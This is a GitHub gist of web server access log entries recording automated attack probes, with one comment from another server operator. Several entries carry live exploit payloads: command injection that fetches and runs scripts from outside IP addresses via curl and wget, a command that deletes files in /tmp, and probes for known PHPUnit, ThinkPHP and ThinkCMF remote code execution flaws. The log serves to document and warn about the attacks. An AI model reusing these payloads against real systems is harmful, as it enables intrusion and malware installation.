Skip to content

Instantly share code, notes, and snippets.

@coffebar
Created July 21, 2020 07:56
Show Gist options
  • Save coffebar/7b56dc72c93a0422cdbe4214ee7e4851 to your computer and use it in GitHub Desktop.
Save coffebar/7b56dc72c93a0422cdbe4214ee7e4851 to your computer and use it in GitHub Desktop.
log of the hackers bot
122.155.10.51 - - [19/Jul/2020:13:22:44 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 484 "-" "-"
102.44.142.173 - - [20/Jul/2020:21:55:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.0" 404 481 "-" "Hello, world"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "POST /api/jsonws/invoke HTTP/1.0" 404 473 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 475 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.0" 200 865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.21 - - [21/Jul/2020:08:48:06 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 200 865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
@ArcadaLabs-Jason
Copy link

I just saw this same thing on one of my servers this morning. Doesn't appear to have been successful.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment